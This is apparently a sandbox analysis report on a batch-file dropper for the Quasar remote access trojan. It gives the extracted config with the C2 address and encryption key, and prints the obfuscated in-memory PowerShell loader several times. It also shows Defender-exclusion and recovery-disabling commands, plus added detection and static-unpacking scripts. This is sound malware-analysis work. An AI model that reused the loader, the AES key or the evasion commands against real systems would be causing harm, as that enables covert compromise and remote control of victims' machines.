Analysis

  • max time kernel
    80s
  • max time network
    81s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    23-01-2025 19:45

Errors

Reason
Machine shutdown (the sample itself ended the run: the third PowerShell loader spawned shutdown.exe /s /t 0, PID 3020 in the Processes tree below)

General

  • Target

    cloudflare.bat

  • Size

    1.6MB

  • MD5

    d7ef2415ae2b53c9cc8d960f332b2fc2

  • SHA1

    5ee9e9075d7eff88b9b6f6640dd23b04d3d89bf8

  • SHA256

    d09f2f0f47441da499f40328373ea30f5b2fba8f75f8d84e1df54f0d39c363e8

  • SHA512

    0d0b614e2f6c25408d3e35679d41dd9a96f90b54ffd373db1e5be1809d8384370baf391b0c55c6769b730d3ca319efcc052a3ebf77cf5cfb502dac66fd2489e4

  • SSDEEP

    24576:6dbChi2BlJAy2y618+L24nMTz0ZpAsb1EwG5M1XxWMkp2b8DU+owr4SeBlKcvREH:9i2Bl+2TzZw5XMe4DU+zrSl+v

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

explore

C2

45.88.186.152:4782

Mutex

4b5ff9f7-66f8-4c52-adcb-b84eb3e09f69

Attributes
  • encryption_key

    0D83B228073938065AB8FEE60BD7542CA8D42A20

  • install_name

    Onedrive.exe

  • log_directory

    Logs

  • reconnect_delay

    300

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir
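
The extracted config above is enough to sweep a suspect host without touching the sample. The following PowerShell is an added example, not part of the Triage report or of Quasar itself: it checks for the startup_key as a Run value, the install_name under the subdirectory, the mutex, an open socket to the C2, and the two defense-evasion changes this sample makes later in the process tree (a Defender exclusion for C:\ and WinRE disabled via reagentc). The parent directories tried for SubDir are an assumption (the report only gives the leaf names), as is the Run-key hive, which depends on whether the client ran elevated; the mutex check assumes the client creates it without a Global\ prefix, so run the sweep from the logon session you suspect.

```powershell
# Added example (not from the Triage report or the Quasar project): read-only host triage
# for the config extracted above. Run in an elevated PowerShell on the suspect host.

$C2Host      = '45.88.186.152'                          # values from the report
$C2Port      = 4782
$MutexName   = '4b5ff9f7-66f8-4c52-adcb-b84eb3e09f69'
$InstallName = 'Onedrive.exe'
$SubDir      = 'SubDir'
$StartupKey  = 'Quasar Client Startup'

$findings = New-Object System.Collections.Generic.List[string]

# 1. Persistence: the startup_key is written as a Run value. Hive is an assumption
#    (HKCU for an unprivileged client, HKLM when it ran elevated), so check both.
foreach ($hive in 'HKCU:', 'HKLM:') {
    $runKey = Join-Path $hive 'Software\Microsoft\Windows\CurrentVersion\Run'
    $val = Get-ItemProperty -Path $runKey -Name $StartupKey -ErrorAction SilentlyContinue
    if ($val) { $findings.Add("Run value '$StartupKey' in $runKey -> $($val.$StartupKey)") }
}

# 2. Dropped binary. Only the leaf names are in the report; the parent roots tried here
#    are an assumption based on where Quasar usually installs.
foreach ($root in $env:APPDATA, $env:ProgramFiles, ${env:ProgramFiles(x86)}) {
    if (-not $root) { continue }
    $p = Join-Path (Join-Path $root $SubDir) $InstallName
    if (Test-Path -Path $p) {
        $h = (Get-FileHash -Path $p -Algorithm SHA256).Hash
        $findings.Add("Install path present: $p (SHA256 $h)")
    }
}

# 3. Live state: the mutex means a client is running now; the socket means it is connected.
$mutex = $null
if ([System.Threading.Mutex]::TryOpenExisting($MutexName, [ref]$mutex)) {
    $mutex.Dispose()
    $findings.Add("Mutex $MutexName exists: a Quasar client is running in this session")
}
Get-NetTCPConnection -RemoteAddress $C2Host -RemotePort $C2Port -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("TCP $($_.State) to ${C2Host}:$C2Port from PID $($_.OwningProcess)") }

# 4. Defense evasion seen in this report's process tree: Defender exclusion for the
#    whole system drive and Windows RE disabled (reagentc /disable).
$excl = (Get-MpPreference -ErrorAction SilentlyContinue).ExclusionPath
if ($excl -contains 'C:\') { $findings.Add('Defender ExclusionPath contains C:\') }
$re = & reagentc.exe /info 2>$null
if ($re -match 'Windows RE status:\s+Disabled') { $findings.Add('Windows RE is disabled') }

if ($findings.Count -eq 0) { 'No Quasar indicators from this report found.' } else { $findings }
```

A hit on the mutex or the socket means the client is live; the Run value, the dropped file, the exclusion and the WinRE state survive a reboot, so a clean reboot does not clear them.
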

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 12 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cloudflare.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8bhRsRHlVCq0oE/jC8znaXL8N3C2l4vOkUX6p5fMCBI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gSWUi9Srt/hMiTUvma/Osg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bvRls=New-Object System.IO.MemoryStream(,$param_var); $PBSCt=New-Object System.IO.MemoryStream; $pTrqw=New-Object System.IO.Compression.GZipStream($bvRls, [IO.Compression.CompressionMode]::Decompress); $pTrqw.CopyTo($PBSCt); $pTrqw.Dispose(); $bvRls.Dispose(); $PBSCt.Dispose(); $PBSCt.ToArray();}function execute_function($param_var,$param2_var){ $fcAKi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $byGGF=$fcAKi.EntryPoint; $byGGF.Invoke($null, $param2_var);}$QgxHT = 'C:\Users\Admin\AppData\Local\Temp\cloudflare.bat';$host.UI.RawUI.WindowTitle = $QgxHT;$SwrfE = [type]::GetType('System.IO.File');$OHVxV = [type]::GetType('System.Environment');$bNKIC = $SwrfE::('txeTllAdaeR'[-1..-11] -join '')($QgxHT);$BVkSS = $OHVxV::NewLine;$YddQR = $bNKIC.Split($BVkSS);$uUoiG = $YddQR;foreach ($IZmUa in $uUoiG) { if ($IZmUa.StartsWith(':: ')) { $tpTzT=$IZmUa.Substring(3); break; }}$payloads_var=[string[]]$tpTzT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -Command "Get-Process powershell | Where-Object { $_.Id -ne 2528 } | Select-Object -ExpandProperty Id"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1292
      • C:\Windows\SYSTEM32\reagentc.exe
        "reagentc.exe" /disable
        3⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        PID:3348
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:236
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:448
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cloudflare.bat"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8bhRsRHlVCq0oE/jC8znaXL8N3C2l4vOkUX6p5fMCBI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gSWUi9Srt/hMiTUvma/Osg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bvRls=New-Object System.IO.MemoryStream(,$param_var); $PBSCt=New-Object System.IO.MemoryStream; $pTrqw=New-Object System.IO.Compression.GZipStream($bvRls, [IO.Compression.CompressionMode]::Decompress); $pTrqw.CopyTo($PBSCt); $pTrqw.Dispose(); $bvRls.Dispose(); $PBSCt.Dispose(); $PBSCt.ToArray();}function execute_function($param_var,$param2_var){ $fcAKi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $byGGF=$fcAKi.EntryPoint; $byGGF.Invoke($null, $param2_var);}$QgxHT = 'C:\Users\Admin\AppData\Local\Temp\cloudflare.bat';$host.UI.RawUI.WindowTitle = $QgxHT;$SwrfE = [type]::GetType('System.IO.File');$OHVxV = [type]::GetType('System.Environment');$bNKIC = $SwrfE::('txeTllAdaeR'[-1..-11] -join '')($QgxHT);$BVkSS = $OHVxV::NewLine;$YddQR = $bNKIC.Split($BVkSS);$uUoiG = $YddQR;foreach ($IZmUa in $uUoiG) { if ($IZmUa.StartsWith(':: ')) { $tpTzT=$IZmUa.Substring(3); break; }}$payloads_var=[string[]]$tpTzT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1460
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -Command "Get-Process powershell | Where-Object { $_.Id -ne 1460 } | Select-Object -ExpandProperty Id"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4468
        • C:\Windows\SYSTEM32\reagentc.exe
          "reagentc.exe" /disable
          3⤵
          • Drops file in Windows directory
          PID:660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4588
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1728302516.txt
      1⤵
      • Opens file in notepad (likely ransom note)
      PID:2056
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cloudflare.bat" "
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1040
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8bhRsRHlVCq0oE/jC8znaXL8N3C2l4vOkUX6p5fMCBI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gSWUi9Srt/hMiTUvma/Osg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bvRls=New-Object System.IO.MemoryStream(,$param_var); $PBSCt=New-Object System.IO.MemoryStream; $pTrqw=New-Object System.IO.Compression.GZipStream($bvRls, [IO.Compression.CompressionMode]::Decompress); $pTrqw.CopyTo($PBSCt); $pTrqw.Dispose(); $bvRls.Dispose(); $PBSCt.Dispose(); $PBSCt.ToArray();}function execute_function($param_var,$param2_var){ $fcAKi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $byGGF=$fcAKi.EntryPoint; $byGGF.Invoke($null, $param2_var);}$QgxHT = 'C:\Users\Admin\AppData\Local\Temp\cloudflare.bat';$host.UI.RawUI.WindowTitle = $QgxHT;$SwrfE = [type]::GetType('System.IO.File');$OHVxV = [type]::GetType('System.Environment');$bNKIC = $SwrfE::('txeTllAdaeR'[-1..-11] -join '')($QgxHT);$BVkSS = $OHVxV::NewLine;$YddQR = $bNKIC.Split($BVkSS);$uUoiG = $YddQR;foreach ($IZmUa in $uUoiG) { if ($IZmUa.StartsWith(':: ')) { $tpTzT=$IZmUa.Substring(3); break; }}$payloads_var=[string[]]$tpTzT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -Command "Get-Process powershell | Where-Object { $_.Id -ne 2740 } | Select-Object -ExpandProperty Id"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4188
        • C:\Windows\SYSTEM32\reagentc.exe
          "reagentc.exe" /disable
          3⤵
          • Drops file in Windows directory
          PID:4220
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:924
        • C:\Windows\System32\shutdown.exe
          "C:\Windows\System32\shutdown.exe" /s /t 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3020
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x4 /state0:0xa39bf855 /state1:0x41c64e6d
      1⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of SetWindowsHookEx
      PID:4212
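
The loader on each powershell.exe command line above is the same three-stage wrapper, with the sensitive .NET method names stored reversed so that plain string matching misses them: 'gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'txeTllAdaeR'[-1..-11] is ReadAllText and 'daoL'[-1..-4] is Load. It re-reads cloudflare.bat, takes the first line that starts with ':: ' (a cmd.exe comment, so the batch parser skips it while the 1.6MB of payload rides inside it), splits that line on '\' into two base64 blobs, AES-256-CBC-decrypts each with the hard-coded 32-byte key and 16-byte IV, gunzips the result and hands the bytes to Assembly.Load followed by EntryPoint.Invoke, so neither payload ever touches disk; the second one is invoked with an empty string[] to satisfy a Main(string[] args). The script below is an added example, not code from the report or from the malware: it reproduces the decrypt and decompress steps with the key and IV taken from the command line but writes the payloads to disk and hashes them instead of loading them. The output directory is an assumption; the .bat path is the one from the report. Run it only on an isolated analysis VM, since the written files are the live Quasar client and its companion.

```powershell
# Added example (not part of the report or the malware): statically unpack the two payloads
# carried in cloudflare.bat using the loader's own key/IV, WITHOUT calling Assembly.Load.
# $OutDir is an assumption; $BatPath is the path the sample used in the sandbox.
param(
    [string]$BatPath = 'C:\Users\Admin\AppData\Local\Temp\cloudflare.bat',
    [string]$OutDir  = 'C:\analysis\cloudflare_bat'
)
$KeyB64 = '8bhRsRHlVCq0oE/jC8znaXL8N3C2l4vOkUX6p5fMCBI='   # 32 bytes -> AES-256, from the loader
$IvB64  = 'gSWUi9Srt/hMiTUvma/Osg=='                       # 16 bytes, from the loader

function Unprotect-LoaderBlob([byte[]]$Blob) {
    # Mirrors decrypt_function: AES-CBC, PKCS7, fixed key and IV.
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = [Convert]::FromBase64String($KeyB64)
        $aes.IV      = [Convert]::FromBase64String($IvB64)
        $dec = $aes.CreateDecryptor()
        try { return $dec.TransformFinalBlock($Blob, 0, $Blob.Length) } finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-GzipBytes([byte[]]$Data) {
    # Mirrors decompress_function: one GZip member, fully expanded into memory.
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out); return $out.ToArray() } finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

# The carrier line: first line beginning ':: ', payloads separated by '\' (same as the loader).
$carrier = [System.IO.File]::ReadAllLines($BatPath) |
    Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
if (-not $carrier) { throw "No ':: ' payload line found in $BatPath" }
$blobs = $carrier.Substring(3).Split('\')
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

$i = 0
foreach ($b64 in $blobs) {
    $i++
    [byte[]]$bytes = Expand-GzipBytes (Unprotect-LoaderBlob ([Convert]::FromBase64String($b64)))
    $isPe = ($bytes.Length -gt 2) -and ($bytes[0] -eq 0x4D) -and ($bytes[1] -eq 0x5A)   # 'MZ' header
    $dst  = Join-Path $OutDir ("payload{0}.bin" -f $i)
    [System.IO.File]::WriteAllBytes($dst, $bytes)
    $sha  = (Get-FileHash -Path $dst -Algorithm SHA256).Hash
    "{0}: {1} bytes, PE={2}, SHA256={3}" -f $dst, $bytes.Length, $isPe, $sha
}
```

Both recovered files should start with MZ and are .NET assemblies (the loader calls Assembly.Load on them), so they can go straight into a .NET decompiler; the Quasar config in the Malware Config section above came out of one of them. The `.bin` extension keeps them from being double-clicked by accident.
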

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      22e796539d05c5390c21787da1fb4c2b

      SHA1

      55320ebdedd3069b2aaf1a258462600d9ef53a58

      SHA256

      7c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92

      SHA512

      d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      2e8eb51096d6f6781456fef7df731d97

      SHA1

      ec2aaf851a618fb43c3d040a13a71997c25bda43

      SHA256

      96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

      SHA512

      0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      a698c38ef9f10ca65f550ced931180ac

      SHA1

      8165a1604db2554fb3b6f1612abfbb1b6a477b7a

      SHA256

      d9075926e6a8d5d24433e07c6bb7d53572c79194401bdc982718f0963ee83e13

      SHA512

      507b85dad13336c12ef1d881dfafeb5ec1e821cde2bda7ca9facb63a27c1eabeb44d7b291e9fc7eb0ee10ec1da4ef66dbc10c6c15621acaa11b6484d06bd4c63

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      c7375ed55b5fd68694eb2dfcff1895fa

      SHA1

      e7b95928fb51464dee4b78d3c4c63263d07466b0

      SHA256

      6227f5183488de6ca89901c5ba349501cb0b96015d330527d596f2fddeb3a042

      SHA512

      55056e9f218267907e1435e02dafbbd3b6e30381c5095f3e874aa6dcf68ba24a0e09486aec041c91189d4fea6605e05eb24abaedc87b1124e3a8486286bdcd8a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      d0a4a3b9a52b8fe3b019f6cd0ef3dad6

      SHA1

      fed70ce7834c3b97edbd078eccda1e5effa527cd

      SHA256

      21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

      SHA512

      1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      f246fbfb796aae4671f8aba07569f228

      SHA1

      dd75dbf9c12a73541bebc1bb5b14588a0dbd4aa1

      SHA256

      d9f027a2d4b777275055bcaffc9e83c4156dc1bd15d2e9125c5c224a5582d66d

      SHA512

      9736a13431c4f63b820de10d69d641924e2db2d990052ede27d86474f742e820d5bf1150312014c56c6daf95a4e3993dfd86cc5709cd0b65598749dbcc182f59

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5aypq3ef.zm2.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Windows\Logs\ReAgent\ReAgent.log

      Filesize

      5KB

      MD5

      3dd23310467b4e2eabdc60874bf0422c

      SHA1

      d263030a13ef67035254426e44db78968e6a1a87

      SHA256

      e4f32508435330b533ecbeb169cb8ead1e1c9483ee5bfda78af9f31d475ce463

      SHA512

      3597dd4d22a58247cc85cfeb32c1feb30177b4307bff4235602f5d5a527461d4ddcf423436dc31cf3e9f2d697f14208019f469eed159e60631a8a41dfdf2ceb2

    • C:\Windows\Logs\ReAgent\ReAgent.log

      Filesize

      2KB

      MD5

      3ba5a6802462620406a3486549d61de1

      SHA1

      6648daba421264117cd8104c21007857a724c624

      SHA256

      232701322b4f8d5f1e1dde06d9c6c3cf261caf34fdda7c5a1289da61bd701ac0

      SHA512

      8e2a34ba7bc7d10f5af3dccde4b945bd6c8a2a614da57bd1d47fc2a1ed8be3c6912e97d6d87b901f46ca2415806651e05bca6f3fe3877a9ce9ba799bddee6ec7

    • C:\Windows\Panther\UnattendGC\diagerr.xml

      Filesize

      13KB

      MD5

      03610761b90ccd08a46a8d8cc940a593

      SHA1

      137a4eb26291a1778834f1b8a6df9f4bc0e4bf7d

      SHA256

      83c80289c95deaa1e77cf4e29a13560801034dd12c6e138c64ebfa0ab4f3fb09

      SHA512

      eb64a1f57dc973e2707340d459d91f9e7b28051188b570dfceff22aa20532a80e8f761c624c54f2db78d948c39a9365d05b9711e6fdadf4866b58a47ff172bb5

    • C:\Windows\Panther\UnattendGC\diagerr.xml

      Filesize

      11KB

      MD5

      5e90709a49ed62682a05d9ce1e8d11aa

      SHA1

      460db9372713142b701d21d6ce01fbf804bd38dc

      SHA256

      3d5e9572b2f72888dec3b883a6eba8f2a9b7527a9c2612fd7d4658a141b84182

      SHA512

      2bca5e7ee3b62fa975aecb904aac44af1b938e13c3261ebab963ce01d361c69ecfad1772a3f6ede4135c924e86b2c9931f1b4f6f96a20cae1766e83fdda711f6

    • C:\Windows\Panther\UnattendGC\diagwrn.xml

      Filesize

      15KB

      MD5

      8ddc9342c3d47a8a98d5165d3bdd77ed

      SHA1

      6ef5a5622740c477af84736df188490cd684251f

      SHA256

      eb2e6c996e9e699ba0ab7ef15f9556cf50b6725fba48afe1ca483ac2060cfc26

      SHA512

      bc269ac4a8edd2a04a1f3542080d9bb5e263ca2748578e3cf3e1d7c30f7340ce697e282debdfd319a07d3c67fc48dce9bbb557584a4eb4fab351535bb859d062

    • C:\Windows\Panther\UnattendGC\diagwrn.xml

      Filesize

      13KB

      MD5

      cce57206d18e2b38d35e2049d44fa9a7

      SHA1

      66856a7e333f5d95f68886a3e179647a8d1b1691

      SHA256

      a2fbe953e4f553cbb0819cdc9e74938446b6c55daec5d9a9d9215c28e31141b6

      SHA512

      3531f69ed30c5119a62ba5ffd660bd667b26bd1492b9da98c5cdc3172b47a975f2d3dd24d8642062bc3a86f25b9a0092f4f0c69b9b6b3483a71bac2ad3efa3e8

    • C:\Windows\Panther\UnattendGC\setuperr.log

      Filesize

      193B

      MD5

      cb2a6f2f925f79cf4d4ab3501a0d2fc6

      SHA1

      cfa8aa50dd073244450a60cab2591c833b054f95

      SHA256

      e9bf68f1edfc77cacb4cfd45183db13d14ca0eb6769a2771a81054b34fc66f40

      SHA512

      34c22bb165376941e046b3d9ca207212c60b9fb66b08e20706ac7e0fde2e9b11223e9407840e56d687b585177aca49e8da1b046b823cc3bd1382ea9e0c175151

    • C:\Windows\system32\Recovery\ReAgent.xml

      Filesize

      1KB

      MD5

      910f3916ede823b6b4b5e302e6ececbe

      SHA1

      d41dda3f32687605193ad0f421c6b3e2bc48ec97

      SHA256

      5cd6fa01b3949b7fca0fdbdab434d93badcfcdf09de8e2881268abf7ed7064fa

      SHA512

      893f4a7f2cb3b6aa2ebd0e82f1ab55658b4e7791872bfb97dd269c35df0199c9b590e0902a83cfc8ae85f883f8adb6f514593d4dde68d2c0a5406ecc7851f582

    • memory/1292-24-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

      Filesize

      10.8MB

    • memory/1292-29-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

      Filesize

      10.8MB

    • memory/1292-23-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

      Filesize

      10.8MB

    • memory/1292-25-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

      Filesize

      10.8MB

    • memory/1292-26-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

      Filesize

      10.8MB

    • memory/2528-53-0x00007FF8EB653000-0x00007FF8EB655000-memory.dmp

      Filesize

      8KB

    • memory/2528-48-0x00000234286C0000-0x0000023428882000-memory.dmp

      Filesize

      1.8MB

    • memory/2528-54-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

      Filesize

      10.8MB

    • memory/2528-55-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

      Filesize

      10.8MB

    • memory/2528-56-0x0000023428F80000-0x00000234294A8000-memory.dmp

      Filesize

      5.2MB

    • memory/2528-43-0x00000234274A0000-0x00000234277C4000-memory.dmp

      Filesize

      3.1MB

    • memory/2528-76-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

      Filesize

      10.8MB

    • memory/2528-51-0x0000023427E20000-0x0000023427E32000-memory.dmp

      Filesize

      72KB

    • memory/2528-52-0x0000023427E80000-0x0000023427EBC000-memory.dmp

      Filesize

      240KB

    • memory/2528-47-0x0000023427EE0000-0x0000023427F92000-memory.dmp

      Filesize

      712KB

    • memory/2528-0-0x00007FF8EB653000-0x00007FF8EB655000-memory.dmp

      Filesize

      8KB

    • memory/2528-46-0x0000023427DD0000-0x0000023427E20000-memory.dmp

      Filesize

      320KB

    • memory/2528-14-0x00000234271E0000-0x0000023427312000-memory.dmp

      Filesize

      1.2MB

